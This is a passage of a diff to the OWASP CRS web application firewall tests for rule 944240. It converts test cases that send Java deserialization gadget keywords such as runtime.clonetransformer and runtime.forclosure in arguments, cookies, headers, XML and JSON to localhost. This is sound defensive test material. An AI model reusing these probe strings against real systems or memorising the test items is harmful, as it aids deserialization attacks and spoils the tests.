"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.clonetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 5 desc: "Request header test includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.clonetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.clonetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 6 desc: "XML attribute value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-7 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 7 desc: "XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-8 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 8 desc: "Nested XML element value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 
80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-9 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 9 desc: "Content-Type text/plain includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.clonetransformer" - output: - log_contains: "id \"944240\"" - - test_title: 944240-10 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.clonetransformer" + output: + log: + expect_ids: [944240] + - test_id: 10 desc: "Content-Type 
application/json arg value includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.clonetransformer\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-11 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.clonetransformer\"}" + output: + log: + expect_ids: [944240] + - test_id: 11 desc: "Content-Type application/json arg name includes keyword runtime.clonetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.clonetransformer\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-12 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"runtime.clonetransformer\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 12 desc: "Argument test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-13 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 13 desc: "Argument name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-14 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure=test" + output: + log: + expect_ids: [944240] + - test_id: 14 desc: "Cookie test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-15 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 15 desc: "Cookie name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.forclosure=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-16 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.forclosure=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 16 desc: "Request header test includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.forclosure - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-17 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.forclosure + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 17 desc: "XML attribute value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-18 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 18 desc: "XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-19 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 19 desc: "Nested XML element value includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: 
"localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-20 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 20 desc: "Content-Type text/plain includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.forclosure" - output: - log_contains: "id \"944240\"" - - test_title: 944240-21 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.forclosure" + output: + log: + expect_ids: [944240] + - test_id: 21 desc: "Content-Type application/json arg value includes keyword 
runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"runtime.forclosure\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-22 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"runtime.forclosure\"}" + output: + log: + expect_ids: [944240] + - test_id: 22 desc: "Content-Type application/json arg name includes keyword runtime.forclosure" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"runtime.forclosure\": \"test\"}" - output: - log_contains: "id \"944240\"" - - test_title: 944240-23 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: 
"HTTP/1.0" + data: "{\"runtime.forclosure\": \"test\"}" + output: + log: + expect_ids: [944240] + - test_id: 23 desc: "Argument test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-24 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 24 desc: "Argument name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory=test" - output: - log_contains: "id \"944240\"" - - test_title: 944240-25 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory=test" + output: + log: + expect_ids: [944240] + - test_id: 25 desc: "Cookie test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-26 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 26 desc: "Cookie name includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: runtime.instantiatefactory=test - method: 
"POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-27 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: runtime.instantiatefactory=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 27 desc: "Request header test includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: runtime.instantiatefactory - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-28 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: runtime.instantiatefactory + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944240] + - test_id: 28 desc: "XML attribute value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944240\"" - - test_title: 944240-29 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944240] + - test_id: 29 desc: "XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-30 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 30 desc: "Nested XML element value includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: 
"127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-31 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - test_id: 31 desc: "Content-Type text/plain includes keyword runtime.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=runtime.instantiatefactory" - output: - log_contains: "id \"944240\"" - - test_title: 944240-32 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=runtime.instantiatefactory" + output: + log: + expect_ids: [944240] + - 
